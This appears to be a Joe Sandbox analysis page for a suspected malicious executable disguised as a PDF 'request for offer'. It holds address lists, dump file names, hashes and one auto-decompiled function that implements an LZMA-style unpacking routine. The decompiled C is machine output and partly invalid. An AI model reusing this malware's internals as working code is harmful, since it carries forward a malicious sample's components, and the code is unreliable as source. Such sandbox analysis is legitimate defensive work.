0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406bd1
0x00406bd1
0x00406bd4
0x00000000
0x00000000
0x00406f10
0x00406f10
0x00406f14
0x00406f36
0x00406f36
0x00406f39
0x00406f43
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f16
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00407018
0x00406fd3
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070be
0x004070c1
0x00406fc2
0x00406fc2
0x00406fc2
0x00000000
0x00406fc8
0x00000000
0x00406cf8
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00407018
0x00000000
0x00000000
0x00000000
0x00406d3d
0x00406d3d
0x00406d40
0x00406d76
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd6
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
0x00406e29
0x00406e29
0x00406e2c
0x00406e2f
0x00406ea3
0x00406ea3
0x00406ea3
0x00406ea3
0x00000000
0x00406ea3
0x00406e31
0x00406e31
0x00406e37
0x00406e3a
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e49
0x00406e4c
0x00406e4f
0x00406e52
0x00406e6b
0x00406e6d
0x00406e70
0x00406e71
0x00406e74
0x00406e76
0x00406e79
0x00406e7b
0x00406e7d
0x00406e80
0x00406e82
0x00406e85
0x00406e89
0x00406e8b
0x00406e8b
0x00406e8c
0x00406e8f
0x00406e92
0x00406e54
0x00406e54
0x00406e5c
0x00406e61
0x00406e63
0x00406e66
0x00406e66
0x00406e95
0x00406e9c
0x00406e26
0x00406e26
0x00406e26
0x00406e26
0x00000000
0x00406e9e
0x00406e9e
0x00000000
0x00406e9e
0x00406e9c
0x00406daf
0x00406daf
0x00406db2
0x00406db4
0x00406db7
0x00406dba
0x00406dbd
0x00406dbf
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dc8
0x00406dc8
0x00406dcb
0x00406dd2
0x00406da6
0x00406da6
0x00406da6
0x00406da6
0x00000000
0x00406dd4
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406d58
0x00406d58
0x00406d5b
0x00406d5d
0x00406d60
0x00000000
0x00000000
0x00406abf
0x00406abf
0x00406ac3
0x00407108
0x00407108
0x00000000
0x00407108
0x00406ac9
0x00406ac9
0x00406acc
0x00406acf
0x00406ad2
0x00406ad5
0x00406ad8
0x00406adb
0x00406add
0x00406ae0
0x00406ae3
0x00406ae6
0x00406ae8
0x00406ae8
0x00406ae8
0x00000000
0x00000000
0x00406c4a
0x00406c4a
0x00406c4e
0x00407114
0x00407114
0x00000000
0x00407114
0x00406c54
0x00406c54
0x00406c57
0x00406c5a
0x00406c5d
0x00406c5f
0x00406c5f
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6b
0x00406c6e
0x00406c71
0x00406c72
0x00406c74
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c80
0x00406c80
0x00406c80
0x00406c83
0x00406c85
0x00406c85
0x00000000
0x00000000
0x00406ec7
0x00406ec7
0x00406ec7
0x00406ecb
0x00000000
0x00000000
0x00406ed1
0x00406ed1
0x00406ed4
0x00406ed7
0x00406eda
0x00406edc
0x00406edc
0x00406edc
0x00406edf
0x00406ee2
0x00406ee5
0x00406ee8
0x00406eeb
0x00406eee
0x00406eef
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f04
0x00406f06
0x00406f09
0x00000000
0x00406f0b
0x00406f0b
0x00406c88
0x00406c88
0x00000000
0x00406c88
0x00406f09
0x0040713e
0x0040713e
0x00000000
0x00000000
0x0040676d
0x00407175
0x00407175
0x00000000
0x00407175
0x00406fc2
0x00407042
0x0040700b

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
Instruction ID: ad0bcc128236992ad7a4f6733702d2b43af4dc4d223e88fe38095793509b9f66
Opcode Fuzzy Hash: c054bf0c5d93fa0a7b6250bc48fdf5a8ef487737ec2afd77fa79e2fd840b2821
Instruction Fuzzy Hash: 62A15671D04229CBDF28CFA8C854AADBBB1FF44305F14816ED856BB281C7785986CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F10 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F10() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
